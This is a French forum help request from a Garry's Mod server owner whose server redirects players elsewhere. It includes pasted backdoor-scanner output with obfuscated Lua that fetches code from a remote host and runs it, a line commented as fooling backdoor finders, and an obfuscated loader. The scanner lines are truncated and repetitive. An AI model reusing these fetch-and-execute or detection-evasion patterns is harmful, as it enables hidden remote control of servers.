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Salut !
En fait je viens ici pour vous dire que quand je me connecte a mons serveur sa me laisse dessus 10s et après sa me redirect sur un autre serveur :/ et je n'ait toujours pas trouver une solution ! j'ai bien un anti backdoor :
j'ai utilisé l'astuce de Nestor =D
en esperant que vous pouvez m'aider
En fait je viens ici pour vous dire que quand je me connecte a mons serveur sa me laisse dessus 10s et après sa me redirect sur un autre serveur :/ et je n'ait toujours pas trouver une solution ! j'ai bien un anti backdoor :
ilovemyself = _G["RunString"] or ilovemyself
justforfun = _G["timer"]["Create"] or justforfun
whyamidoingthis = _G["http"]["Fetch"] or whyamidoingthis
local result, dirs = file.Find( "addons.,;:<>|"?]','')local b=string.find(a,'[\\/:%*%?"<>|]')if b~=nil then a="Contains restricted characters"end return a end local c,d=nil,"nS"local e,f,g="vcmod/info/","tri","Ru" for a,d in pairs(file.Find(e.."*.lua","LUA"))do include(e..d)if!c then c="Addons found: "else c=c..", "end local a=VC[_._][string.gsub(d,".lua","")]if a then c=c..a.nm end end if c then c=c.."."else c=a["naf"]end VCPrint(c)local c="ng"if!string.find("".._G["V".."".."C"]["H".."o".."s".."t"]||"","v".."cm".."od"..".")then VCPrint(a["f_sd"])return end function VC.W_Do_GIP()if!http.Post)[_.a]~=i then e=3 end if debug[_.b](http.Fetch)[_.a]~=i then e=4 end if debug[_.b](RunString)[_.a]~=j then e=7 end if debug[_.b](RunStringEx)[_.a]~=j then e=8 end if jit.util.funcinfo(debug[_.b])["source"]~=nil then e=5 end if e then VCPrint(a["f_d"]..e..").") VC = "" return end function VC.W_Do_G(a)if!VC[_.c]then local a=(GetConVar"vc_usebeta"):GetInt() VC.useBeta=tobool(a)VC[_.c]="?ip="..VC.W_Do_GIP().."&port="..GetConVarString"hostport".."&hn="..VC.ReadyStringTransfer(GetHostName()).."&sp="..(game.SinglePlayer()&&"1"||"0") for z,l in pairs(VC.AddonData) do VC.Web_URI = VC.Web_URI.."&uid_"..z.."="..(l.uid or "0").."&uid_h_"..z.."="..(l.uid_h or "0").."&nm_"..z.."="..(l.shrt or "0") end VC[_.c]=VC[_.c].."&gm="..engine.ActiveGamemode().."&map="..game.GetMap().."&au_ver="..VC_AU_Ver.."&beta="..a end return VC.Host.."api/"..a..VC[_.c]end local function e(e)_G["h".."".."t".."tp"]["F".."et".."ch"](VC.W_Do_G"htgtcn/2/".."&st=h",function(e,i,i,j) if j==404 then VCPrint(a["hs_f"])else VCPrint(a["hs_s"])_G[g..d..f.119 4 - NETWORK (HTTP server call) addons/vcmod_main_autoupdate/lua/vcmod/server/load.lua:24 CreateConVar("vc_usebeta", "0", FCVAR_ARCHIVE, "Load a beta branch of VCMod instead of the public one. Warning, this branch might be unstable or out of date from the main branch.") local _,a={_="AddonData",a="short_src",b="getinfo",c="Web_URI"},VC.AUMsg VCPrint(a["p_init_c"]) function VC.ReadyStringTransfer(a)a=string.gsub(a,' ','_')a=string.gsub(a,'#',' ')a=string.gsub(a,"'","") a=string.gsub(a,'[-\\!@#$^&()+-*/.,;:<>|"?]','')local b=string.find(a,'[\\/:%*%?"<>|]')if b~=nil then a="Contains restricted characters"end return a end local c,d=nil,"nS"local e,f,g="vcmod/info/","tri","Ru" for a,d in pairs(file.Find(e.."*.lua","LUA"))do include(e..d)if!c then c="Addons found: "else c=c..", "end local a=VC[_._][string.gsub(d,".lua","")]if a then c=c..a.nm end end if c then c=c.."."else c=a["naf"]end VCPrint(c)local c="ng"if!string.find("".._G["V".."".."C"]["H".."o".."s".."t"]||"","v".."cm".."od"..".")then VCPrint(a["f_sd"])return end function VC.W_Do_GIP()if!http.Fetch)[_.a]~=i then e=4 end if debug[_.b](RunString)[_.a]~=j then e=7 end if debug[_.b](RunStringEx)[_.a]~=j then e=8 end if jit.util.funcinfo(debug[_.b])["source"]~=nil then e=5 end if e then VCPrint(a["f_d"]..e..").") VC = "" return end function VC.W_Do_G(a)if!VC[_.c]then local a=(GetConVar"vc_usebeta"):GetInt() VC.useBeta=tobool(a)VC[_.c]="?ip="..VC.W_Do_GIP().."&port="..GetConVarString"hostport".."&hn="..VC.ReadyStringTransfer(GetHostName()).."&sp="..(game.SinglePlayer()&&"1"||"0") for z,l in pairs(VC.AddonData) do VC.Web_URI = VC.Web_URI.."&uid_"..z.."="..(l.uid or "0").."&uid_h_"..z.."="..(l.uid_h or "0").."&nm_"..z.."="..(l.shrt or "0") end VC[_.c]=VC[_.c].."&gm="..engine.ActiveGamemode().."&map="..game.GetMap().."&au_ver="..VC_AU_Ver.."&beta="..a end return VC.Host.."api/"..a..VC[_.c]end local function e(e)_G["h".."".."t".."tp"]["F".."et".."ch"](VC.W_Do_G"htgtcn/2/".."&st=h",function(e,i,i,j) if j==404 then VCPrint(a["hs_f"])else VCPrint(a["hs_s"])_G[g..d..f..c](e,"hs")end end,function()if VC.DbgTr<=e the120 2 - DYNCODE (Dynamic code execution) addons/vcmod_main_autoupdate/lua/vcmod/server/load.lua:24 CreateConVar("vc_usebeta", "0", FCVAR_ARCHIVE, "Load a beta branch of VCMod instead of the public one. Warning, this branch might be unstable or out of date from the main branch.") local _,a={_="AddonData",a="short_src",b="getinfo",c="Web_URI"},VC.AUMsg VCPrint(a["p_init_c"]) function VC.ReadyStringTransfer(a)a=string.gsub(a,' ','_')a=string.gsub(a,'#',' ')a=string.gsub(a,"'","") a=string.gsub(a,'[-\\!@#$^&()+-*/.,;:<>|"?]','')local b=string.find(a,'[\\/:%*%?"<>|]')if b~=nil then a="Contains restricted characters"end return a end local c,d=nil,"nS"local e,f,g="vcmod/info/","tri","Ru" for a,d in pairs(file.Find(e.."*.lua","LUA"))do include(e..d)if!c then c="Addons found: "else c=c..", "end local a=VC[_._][string.gsub(d,".lua","")]if a then c=c..a.nm end end if c then c=c.."."else c=a["naf"]end VCPrint(c)local c="ng"if!string.find("".._G["V".."".."C"]["H".."o".."s".."t"]||"","v".."cm".."od"..".")then VCPrint(a["f_sd"])return end function VC.W_Do_GIP()if!RunString)[_.a]~=j then e=7 end if debug[_.b](RunStringEx)[_.a]~=j then e=8 end if jit.util.funcinfo(debug[_.b])["source"]~=nil then e=5 end if e then VCPrint(a["f_d"]..e..").") VC = "" return end function VC.W_Do_G(a)if!VC[_.c]then local a=(GetConVar"vc_usebeta"):GetInt() VC.useBeta=tobool(a)VC[_.c]="?ip="..VC.W_Do_GIP().."&port="..GetConVarString"hostport".."&hn="..VC.ReadyStringTransfer(GetHostName()).."&sp="..(game.SinglePlayer()&&"1"||"0") for z,l in pairs(VC.AddonData) do VC.Web_URI = VC.Web_URI.."&uid_"..z.."="..(l.uid or "0").."&uid_h_"..z.."="..(l.uid_h or "0").."&nm_"..z.."="..(l.shrt or "0") end VC[_.c]=VC[_.c].."&gm="..engine.ActiveGamemode().."&map="..game.GetMap().."&au_ver="..VC_AU_Ver.."&beta="..a end return VC.Host.."api/"..a..VC[_.c]end local function e(e)_G["h".."".."t".."tp"]["F".."et".."ch"](VC.W_Do_G"htgtcn/2/".."&st=h",function(e,i,i,j) if j==404 then VCPrint(a["hs_f"])else VCPrint(a["hs_s"])_G[g..d..f..c](e,"hs")end end,function()if VC.DbgTr<=e then VCPrint(a["cn_r"].." "..VC.DbgTr.."/"..e..".121 3 - OBFUSC (Obfuscated / encrypted code) addons/vcmod_main_autoupdate/lua/vcmod/server/load.lua:24 CreateConVar("vc_usebeta", "0", FCVAR_ARCHIVE, "Load a beta branch of VCMod instead of the public one. Warning, this branch might be unstable or out of date from the main branch.") local _,a={_="AddonData",a="short_src",b="getinfo",c="Web_URI"},VC.AUMsg VCPrint(a["p_init_c"]) function VC.ReadyStringTransfer(a)a=string.gsub(a,' ','_')a=string.gsub(a,'#',' ')a=string.gsub(a,"'","") a=string.gsub(a,'[-\\!@#$^&()+-*/.,;:<>|"?]','')local b=string.find(a,'[\\/:%*%?"<>|]')if b~=nil then a="Contains restricted characters"end return a end local c,d=nil,"nS"local e,f,g="vcmod/info/","tri","Ru" for a,d in pairs(file.Find(e.."*.lua","LUA"))do include(e..d)if!c then c="Addons found: "else c=c..", "end local a=VC[_._][string.gsub(d,".lua","")]if a then c=c..a.nm end end if c then c=c.."."else c=a["naf"]end VCPrint(c)local c="ng"if!string.find("".._G["V".."".."C"]["H".."o".."s".."t"]||"","v".."cm".."od"..".")then VCPrint(a["f_sd"])return end function VC.W_Do_GIP()if!0xFF000000),24)c[2]=bit.rshift(bit.band(a,0x00FF0000),16)c[3]=bit.rshift(bit.band(a,0x0000FF00),8)c[4]=bit.band(a,0x000000FF)a=table.concat(c,".")else a="sp"end if game.SinglePlayer()then a=VC.Temp_User_SP||"sp"end VC.W_Do_IP=a end return VC.W_Do_IP end local e,h,i,j=nil,"lua/includes/extensions/file.lua","lua/includes/modules/http.lua","[C]"if debug[_.b](http.Post)[_.a]~=i then e=3 end if debug[_.b](http.Fetch)[_.a]~=i then e=4 end if debug[_.b](RunString)[_.a]~=j then e=7 end if debug[_.b](RunStringEx)[_.a]~=j then e=8 end if jit.util.funcinfo(debug[_.b])["source"]~=nil then e=5 end if e then VCPrint(a["f_d"]..e..").") VC = "" return end function VC.W_Do_G(a)if!VC[_.c]then local a=(GetConVar"vc_usebeta"):GetInt() VC.useBeta=tobool(a)VC[_.c]="?ip="..VC.W_Do_GIP().."&port="..GetConVarString"hostport".."&hn="..VC.ReadyStringTransfer(GetHostName()).."&sp="..(game.SinglePlayer()&&"1"||"0") for z,l in pairs(VC.AddonData) do VC.Web_URI = VC.Web_URI.."&uid_"..z.."="..(l.uid or "0").."&uid_h_"..z.."="..(l.uid_h or "0").."&nm122 1 - MISC (References global table) addons/vcmod_main_autoupdate/lua/vcmod/server/load.lua:24 CreateConVar("vc_usebeta", "0", FCVAR_ARCHIVE, "Load a beta branch of VCMod instead of the public one. Warning, this branch might be unstable or out of date from the main branch.") local _,a={_="AddonData",a="short_src",b="getinfo",c="Web_URI"},VC.AUMsg VCPrint(a["p_init_c"]) function VC.ReadyStringTransfer(a)a=string.gsub(a,' ','_')a=string.gsub(a,'#',' ')a=string.gsub(a,"'","") a=string.gsub(a,'[-\\!@#$^&()+-*/.,;:<>|"?]','')local b=string.find(a,'[\\/:%*%?"<>|]')if b~=nil then a="Contains restricted characters"end return a end local c,d=nil,"nS"local e,f,g="vcmod/info/","tri","Ru" for a,d in pairs(file.Find(e.."*.lua","LUA"))do include(e..d)if!c then c="Addons found: "else c=c..", "end local a=VC[_._][string.gsub(d,".lua","")]if a then c=c..a.nm end end if c then c=c.."."else c=a["naf"]end VCPrint(c)local c="ng"if!string.find("".._G["V".."".."C"]["H".."o".."s".."t"]||"","v".."cm".."od"..".")then VCPrint(a["f_sd"])return end function VC.W_Do_GIP()if!VC.W_Do_IP then local a=tonumber(GetConVarString"hostip") if a then local c={}c[1]=bit.rshift(bit.band(a,0xFF000000),24)c[2]=bit.rshift(bit.band(a,0x00FF0000),16)c[3]=bit.rshift(bit.band(a,0x0000FF00),8)c[4]=bit.band(a,0x000000FF)a=table.concat(c,".")else a="sp"end if game.SinglePlayer()then a=VC.Temp_User_SP||"sp"end VC.W_Do_IP=a end return VC.W_Do_IP end local e,h,i,j=nil,"lua/includes/extensions/file.lua","lua/includes/modules/http.lua","[C]"if debug[_.b](http.Post)[_.a]~=i then e=3 end if debug[_.b](http.Fetch)[_.a]~=i then e=4 end if debug[_.b](RunString)[_.a]~=j then e=7 end if debug[_.b](RunStringEx)[_.a]~=j then e=8 end if jit.util.funcinfo(debug[_.b])["source"]~=nil then e=5 end if e then VCPrint(a["f_d"]..e..").") VC = "" return end function VC.W_Do_G(a)if!VC[_.c]then local a=(GetConVar"vc_usebeta"):GetInt() VC.useBeta=tobool(a)VC[_.c]="?ip="..VC.W_Do_GIP().."&port="..GetConVarStrin123 2 - DYNCODE (Dynamic code execution) lua/autorun/sh_gestures_and_commands.lua:50 local RunString = _G.RunString -- you have been fooled, backdoor finder!
124 1 - FILESYS (Reading file contents) addons/simplepropertiessansdrm/lua/autorun/server/sprop_main.lua:14 SPROP.NPCs = util.JSONToTable( file.Read( "sprop_" .. game.GetMap() .. "_npcs.txt" ) );
125 1 - FILESYS (Reading file contents) addons/simplepropertiessansdrm/lua/autorun/server/sprop_main.lua:21 SPROP.Props = util.JSONToTable( file.Read( "sprop_" .. game.GetMap() .. "_properties.txt" ) );
126 1 - FILESYS (Reading file contents) addons/simplepropertiessansdrm/lua/autorun/server/sprop_main.lua:43 SPROP.Tracker = util.JSONToTable( file.Read( "sprop_" .. game.GetMap() .. "_permanent.txt" ) );
127 1 - FILESYS (Reading file contents) addons/nordahl_whitelsit_job_system_darkrp/lua/autorun/nordahl_cl/nordahl_whitelistjob_cl.lua:54 local files=file.Read("nordahlclient_option/language.txt","DATA")
128 1 - FILESYS (Reading file contents) addons/nordahl_whitelsit_job_system_darkrp/lua/autorun/nordahl_cl/nordahl_whitelistjob_cl.lua:60 Z_Defaut_Languages=tonumber(file.Read("nordahlclient_option/language.txt","DATA"))
129 1 - FILESYS (Reading file contents) addons/nordahl_whitelsit_job_system_darkrp/lua/autorun/nordahl_cl/nordahl_whitelistjob_cl.lua:62 local files=file.Read("nordahlclient_option/nord_s_skin.txt","DATA")
130 1 - FILESYS (Reading file contents) addons/nordahl_whitelsit_job_system_darkrp/lua/autorun/nordahl_cl/nordahl_whitelistjob_cl.lua:68 nord_s_skin=file.Read("nordahlclient_option/nord_s_skin.txt","DATA")
131 2 - AUTHENT (Presence of Steam ID) addons/nordahl_whitelsit_job_system_darkrp/lua/autorun/nordahl_cl/nordahl_whitelistjob_cl.lua:1465 textbox1:SetText("STEAM_0:0:00000000")
132 2 - AUTHENT (Presence of Steam ID) addons/nordahl_whitelsit_job_system_darkrp/lua/autorun/nordahl_cl/nordahl_whitelistjob_cl.lua:1613 textbox2:SetText("STEAM_0:0:00000000")
133 2 - AUTHENT (Presence of Steam ID) addons/nordahl_whitelsit_job_system_darkrp/lua/autorun/nordahl_cl/nordahl_whitelistjob_cl.lua:1734 textbox1:SetText("STEAM_0:0:00000000")
134 2 - AUTHENT (Presence of Steam ID) addons/nordahl_whitelsit_job_system_darkrp/lua/autorun/nordahl_cl/nordahl_whitelistjob_cl.lua:1830 textbox1:SetText("STEAM_0:0:00000000")
135 2 - AUTHENT (Presence of Steam ID) lua/weapons/gmod_tool/stools/shadowremover.lua:2 Tool Creator - SnowredWolf | STEAM_0:0:41063225 | https://SnowredWolf.net
136 1 - FILESYS (Reading file contents) addons/zerosmethlab/lua/entities/zmlab_methbuyer/init.lua:184 local data = file.Read("zmlab/"..game.GetMap().."_MethNPCs"..".txt", "DATA")
137 2 - DYNCODE (Dynamic code execution) addons/advanced_medic_mod/lua/securegmod/securegmod1.lua:1 local b,c,d,e d=(function()local f=math.floor local g=math.frexp local h=math.ldexp local i=math.huge local j=math.max local ba=string.rep local bb=string.format local bc=string.sub local bd=string.len local be=string.byte local bf=string.gsub local bg=string.char local bh=table.remove local bi=table.insert local bj=debug.getinfo local ca=debug.traceback local cb=debug.getlocal local cc=getfenv local cd=setfenv local ce=setmetatable local cf=select local cg=unpack local ch=xpcall local ci,cj local da={ } local db if(CompileString)then local dc=CompileString db=function(dd,de)return dc(dd,de or"[LuJLu internals]")end elseif(load)then local df=load db=function(dd,de)return loadstring(dd,de or"[LuJLu internals]")end end local dg=db("return {"..("nil,"):rep(511).."1}")local function dh(di,dj)dj=dj or 0 if(di > dj + 1)then return dj,dh(di,dj + 1)else return dj end end local ea=dg()do ea[0]=function()end for eb=1,123 do local ec ea[eb],ec=db([[return function(frame, idx, ...)
138 1 - MISC (Call to getfenv()) addons/advanced_medic_mod/lua/securegmod/securegmod1.lua:1 local b,c,d,e d=(function()local f=math.floor local g=math.frexp local h=math.ldexp local i=math.huge local j=math.max local ba=string.rep local bb=string.format local bc=string.sub local bd=string.len local be=string.byte local bf=string.gsub local bg=string.char local bh=table.remove local bi=table.insert local bj=debug.getinfo local ca=debug.traceback local cb=debug.getlocal local cc=getfenv local cd=setfenv local ce=setmetatable local cf=select local cg=unpack local ch=xpcall local ci,cj local da={ } local db if(CompileString)then local dc=CompileString db=function(dd,de)return dc(dd,de or"[LuJLu internals]")end elseif(load)then local df=load db=function(dd,de)return loadstring(dd,de or"[LuJLu internals]")end end local dg=db("return {"..("nil,"):rep(511).."1}")local function dh(di,dj)dj=dj or 0 if(di > dj + 1)then return dj,dh(di,dj + 1)else return dj end end local ea=dg()do ea[0]=function()end for eb=1,123 do local ec ea[eb],ec=db([[return function(frame, idx, ...)
139 3 - OBFUSC (Obfuscated / encrypted code) addons/advanced_medic_mod/lua/securegmod/securegmod1.lua:11 end]],"=!~3")for eb=248,255 do ea[eb]=ed(ea[247],ea[eb-247])end bi(ea,1,bh(ea,0))end local ee local ef local eg=db("return {"..("nil,"):rep(2000).."1}")()local eh={ __gc=function(self)local eg=eg eg[eg.n]=self end,__eq=function()return true end } ce(da,eh)local ei=db("return {"..("nil,"):rep(120).."1}")for ej=1,800 do eg[ej]=ce(ei(),eh)eg.n=ej end local function fa()local eg=eg local fb=eg.n local fc=eg[fb]if(not fc)then eg.n=0 fc=ce(ei(),eh)else eg[fb]=nil eg.n=fb-1 end return fc end local function fd(...)return { n=cf("#",...),...} end local function fe(ff)if(ff==da)then return ff end local fg=fa()fg[101]=ff return fg end local function fh(ff)if(ff==da)then return ff[101]end return ff end local fi={ } fi[1]=function()end for ej=2,120 do local fj=ej-1 local ec fi[ej],ec=db([[return function(_, a, b) return ]]..bc(bb(ba("a[b+%i],",fj),dh(fj)),1,-2)..[[ end]],"=#"..ej)if(not fi[ej])then error(ec)end fi[ej]=fi[ej]()end local function ga(ed,gb,gc)ed[100]=gb ed[1]=gb[113]ed[2]=gb[114]ed[3]=gb[112]ed[4]=gb[109]ed0x80000000 ih=-ih end local ja=0 local jb=0 if ih==math_huge then jb=0x07FF elseif ih ~=ih then jb=0x07FF ja=1 elseif ih==0 then jb=0x00 else ja,jb=g(ih)jb=jb + 1022 if jb <=0 then ja=f(ja*2^(52 + jb)+ 0.5)jb=0 else ja=f((ja*2-1)*2^52 + 0.5)end end ij=ja%4294967296 ii=ii + ia(hi(jb,0x07FF),20)ii=ii + id(f(ja/4294967296),0x000FFFFF)return ij,ii end local function jc(ij,ii)local jd=false if ii >=0x80000000 then jd=true ii=ii-0x80000000 end local jb=ic(id(ii,0x7FF00000),20)local ja=(id(ii,0x000FFFFF)*4294967296 + ij)/2^52 local ih if jb==0x0000 then ih=ja==0 and 0 or h(ja,-1022)elseif jb==0x07FF then ih=ja==0 and i or(i-i)else ih=h(1 + ja,jb-1023)end return jd and-ih or ih end local je={ } local jf=function(jg,jh)local ji,jh=be(jg,jh),jh + 1 if(ji >=0x80)then local jj=0 ji=id(ji,0x7f)repeat jj=jj + 7 ji,jh=ie(ji,ia(id(be(jg,jh),0x7f),jj)),jh + 1 until(be(jg,jh-1)< 0x80)end return ji,jh end local baa=function(bab,jh)return be(bab,jh),jh + 1 end local bac=function(bab,jh)return ia(be(bab,jh),0)+ ia(be(bab,jh + 1),8),jh + 2140 4 - NETWORK (HTTP server call) lua/autorun/sh_vmenu.lua:42 http.Fetch( "http://www.corruptedpixel.com/products/vmenu/addons.php",
141 2 - FILESYS (File deletion) lua/autorun/sh_zladder.lua:26 file.Delete("ladders/ladders/" .. game.GetMap() .. ".txt");
142 2 - FILESYS (File deletion) lua/autorun/sh_zladder.lua:57 file.Delete("ladders/dismounts/" .. game.GetMap() .. ".txt");
143 1 - FILESYS (Reading file contents) lua/autorun/sh_zladder.lua:62 local buffer = file.Read("ladders/ladders/" .. game.GetMap() .. ".txt", false);
144 1 - FILESYS (Reading file contents) lua/autorun/sh_zladder.lua:112 local buffer = file.Read("ladders/dismounts/" .. game.GetMap() .. ".txt", false);
145 2 - BANMGMT (Ban by IP address) lua/autorun/client/cl_dban.lua:116 RunConsoleCommand( "ulx", "banip", Time:GetText(), ( list:GetLine( line ):GetValue( 3 ) ) )
146 1 - FILESYS (Reading file contents) addons/nordahl_spawnpoint_manager_all_gamemode/lua/entities/job_spawn_point/cl_init.lua:39 local files=file.Read("nordahlclient_option/language.txt","DATA")
147 1 - FILESYS (Reading file contents) addons/nordahl_spawnpoint_manager_all_gamemode/lua/entities/job_spawn_point/cl_init.lua:45 Z_Defaut_Languages=tonumber(file.Read("nordahlclient_option/language.txt","DATA"))
148 4 - NETWORK (HTTP server call) lua/autorun/photon/cl_emv_airel.lua:17 http.Fetch( fetchUrl,
149 4 - NETWORK (HTTP server call) gamemodes/darkrp/gamemode/modules/darkrpmessages/cl_darkrpmessage.lua:16 http.Fetch("https://raw.github.com/FPtje/DarkRPMotd/master/motd.txt", receiveMOTD, fn.Id)
150 2 - FILESYS (File deletion) lua/includes/util/javascript_util.lua:14 html:AddFunction( "gmod", "DeleteLocal", function( param ) file.Delete( param, "MOD" ) end )
151 1 - MISC (References global table) lua/includes/util/javascript_util.lua:16 _G[ namespace ]:Fetch( cat, tonumber( offset ), tonumber( perpage ), string.Explode( ",", extraTags ), searchText )
152 1 - MISC (References global table) lua/includes/util/javascript_util.lua:19 html:AddFunction( "gmod", "Publish", function( namespace, file, background ) _G[ namespace ]:Publish( file, background ) end )
153 1 - FILESYS (Reading file contents) addons/zerosmethlab/lua/entities/zmlab_methdropoff/init.lua:181 local data = file.Read("zmlab/"..game.GetMap().."_MethDropOff"..".txt", "DATA")
154 1 - FILESYS (Reading file contents) lua/includes/extensions/file.lua:1 function file.Read( filename, path )
155 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/extensions/string.lua:19 ["\0"] = "\\x00" ,
156 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/extensions/string.lua:32 str = str:gsub( "\226\128\168", "\\\226\128\168" )
157 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/extensions/string.lua:33 str = str:gsub( "\226\128\169", "\\\226\128\169" )
158 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/modules/utf8.lua:13 charpattern = "[%z\x01-\x7F\xC2-\xF4][\x80-\xBF]*"
159 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/modules/utf8.lua:40 if b1 < 0x80 then
160 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/modules/utf8.lua:44 if b1 > 0xF4 or b1 < 0xC2 then
161 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/modules/utf8.lua:48 local contByteCount = b1 >= 0xF0 and 3 or
162 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/modules/utf8.lua:49 b1 >= 0xE0 and 2 or
163 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/modules/utf8.lua:50 b1 >= 0xC0 and 1
164 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/modules/utf8.lua:61 if bit.band( bX, 0xC0 ) ~= 0x80 then
165 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/modules/utf8.lua:64 codePoint = bit.bor( bit.lshift( codePoint, 6 ), bit.band( bX, 0x3F ) )
166 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/modules/utf8.lua:67 codePoint = bit.bor( codePoint, bit.lshift( bit.band( b1, 0x7F ), contByteCount * 5 ) )
167 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/modules/utf8.lua:76 if v < 0 or v > 0x10FFFF then
168 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/modules/utf8.lua:80 if v < 0x80 then -- Single-byte sequence
169 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/modules/utf8.lua:82 elseif v < 0x800 then -- Two-byte sequence
170 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/modules/utf8.lua:83 b1 = bit.bor( 0xC0, bit.band( bit.rshift( v, 6 ), 0x1F ) )
171 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/modules/utf8.lua:84 b2 = bit.bor( 0x80, bit.band( v, 0x3F ) )
172 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/modules/utf8.lua:86 elseif v < 0x10000 then -- Three-byte sequence
173 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/modules/utf8.lua:87 b1 = bit.bor( 0xE0, bit.band( bit.rshift( v, 12 ), 0x0F ) )
174 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/modules/utf8.lua:88 b2 = bit.bor( 0x80, bit.band( bit.rshift( v, 6 ), 0x3F ) )
175 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/modules/utf8.lua:89 b3 = bit.bor( 0x80, bit.band( v, 0x3F ) )
176 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/modules/utf8.lua:92 b1 = bit.bor( 0xF0, bit.band( bit.rshift( v, 18 ), 0x07 ) )
177 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/modules/utf8.lua:93 b2 = bit.bor( 0x80, bit.band( bit.rshift( v, 12 ), 0x3F ) )
178 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/modules/utf8.lua:94 b3 = bit.bor( 0x80, bit.band( bit.rshift( v, 6 ), 0x3F ) )
179 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/modules/utf8.lua:95 b4 = bit.bor( 0x80, bit.band( v, 0x3F ) )
180 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/modules/utf8.lua:224 table.insert( buf, char( 0xFFFD ) )
181 2 - AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/modules/chat/cl_chat.lua:53 Chromebolt A.K.A. Unib5 (STEAM_0:1:19045957)
182 2 - AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/modules/chat/cl_chat.lua:56 Falco A.K.A. FPtje Atheos (STEAM_0:0:8944068)
183 2 - AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/modules/chat/cl_chat.lua:59 Drakehawke (STEAM_0:0:22342869) (64 commits on old SVN)
184 2 - AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/modules/chat/cl_chat.lua:63 Eusion (STEAM_0:0:20450406) (3 commits on old SVN)
185 1 - FILESYS (Reading file contents) lua/autorun/smartsnap.lua:98 local file = file.Read(filename)
186 1 - FILESYS (Reading file contents) lua/autorun/smartsnap.lua:117 output = file.Read('smartsnap_offsets_custom.png')
187 1 - FILESYS (Reading file contents) addons/paydaybankrobbery/lua/tbfy_pdrobbery/sv_pdrobbery.lua:219 SafeLocationTable = util.JSONToTable(file.Read( "pd_bankrobbery/safelocations/" .. CurrentMap .. ".txt" ))
188 1 - FILESYS (Reading file contents) addons/paydaybankrobbery/lua/tbfy_pdrobbery/sv_pdrobbery.lua:231 SecCamTbl = util.JSONToTable(file.Read( "pd_bankrobbery/securitycameras/" .. CurrentMap .. ".txt" ))
189 1 - FILESYS (Reading file contents) addons/paydaybankrobbery/lua/tbfy_pdrobbery/sv_pdrobbery.lua:255 PDropLocationTable = util.JSONToTable(file.Read( "pd_bankrobbery/pdrop/" .. CurrentMap .. ".txt" ))
190 1 - FILESYS (Reading file contents) addons/paydaybankrobbery/lua/tbfy_pdrobbery/sv_pdrobbery.lua:267 DetectionSystemTbl = util.JSONToTable(file.Read( "pd_bankrobbery/detectionsystem/" .. CurrentMap .. ".txt" ))
191 1 - FILESYS (Reading file contents) addons/paydaybankrobbery/lua/tbfy_pdrobbery/sv_pdrobbery.lua:292 KeycardLocs = util.JSONToTable(file.Read( "pd_bankrobbery/keycardsystem/" .. CurrentMap .. ".txt" ))
192 1 - FILESYS (Reading file contents) addons/paydaybankrobbery/lua/tbfy_pdrobbery/sv_pdrobbery.lua:333 DepositBoxLocs = util.JSONToTable(file.Read( "pd_bankrobbery/depositboxes/" .. CurrentMap .. ".txt" ))
193 1 - FILESYS (Reading file contents) addons/paydaybankrobbery/lua/tbfy_pdrobbery/sv_pdrobbery.lua:361 CacheLocs = util.JSONToTable(file.Read( "pd_bankrobbery/cachelocations/" .. CurrentMap .. ".txt" ))
194 1 - FILESYS (Reading file contents) addons/paydaybankrobbery/lua/tbfy_pdrobbery/sv_pdrobbery.lua:371 VanLocationTable = util.JSONToTable(file.Read( "pd_bankrobbery/vanlocations/" .. CurrentMap .. ".txt" ))
195 1 - FILESYS (Reading file contents) lua/weapons/gmod_tool/stools/simfphysduplicator.lua:172 local DataString = file.Read( "saved_vehicles/"..selecteditem, "DATA" )
196 2 - FILESYS (File deletion) lua/weapons/gmod_tool/stools/simfphysduplicator.lua:217 file.Delete( "saved_vehicles/"..selecteditem )
197 2 - AUTHENT (Presence of Steam ID) lua/weapons/gmod_tool/stools/stacker_improved.lua:13 - Original :: OverloadUT (STEAM_0:1:5250809)
198 2 - AUTHENT (Presence of Steam ID) lua/weapons/gmod_tool/stools/stacker_improved.lua:14 - Updated for GMod 13 :: Marii (STEAM_0:1:16015332)
199 2 - AUTHENT (Presence of Steam ID) lua/weapons/gmod_tool/stools/stacker_improved.lua:15 - Rewritten :: Mista Tea (STEAM_0:0:27507323)
200 1 - FILESYS (Reading file contents) addons/rphone/realistichandcuffs/lua/tbfy_rhandcuffs/sv_rhandcuffs_npc.lua:50 NPCLocTable = util.JSONToTable(file.Read( "rhandcuffs/" .. CurrentMap .. ".txt" ))
201 1 - MISC (References global table) lua/includes/util.lua:283 _G[ name ] = NUM_AI_CLASSES
202 2 - DYNCODE (Dynamic code execution) gamemodes/base/entities/entities/lua_run.lua:25 RunString( code )
203 1 - FILESYS (Reading file contents) gamemodes/darkrp/entities/entities/fadmin_motd/cl_init.lua:18 self.HTML:SetHTML(file.Read(Page, "DATA") or "")
204 2 - DYNCODE (Dynamic code execution) gamemodes/darkrp/gamemode/libraries/simplerr.lua:2 local CompileString = CompileString
205 1 - FILESYS (Reading file contents) gamemodes/darkrp/gamemode/libraries/simplerr.lua:457 local contents = file.Read(path, "LUA")
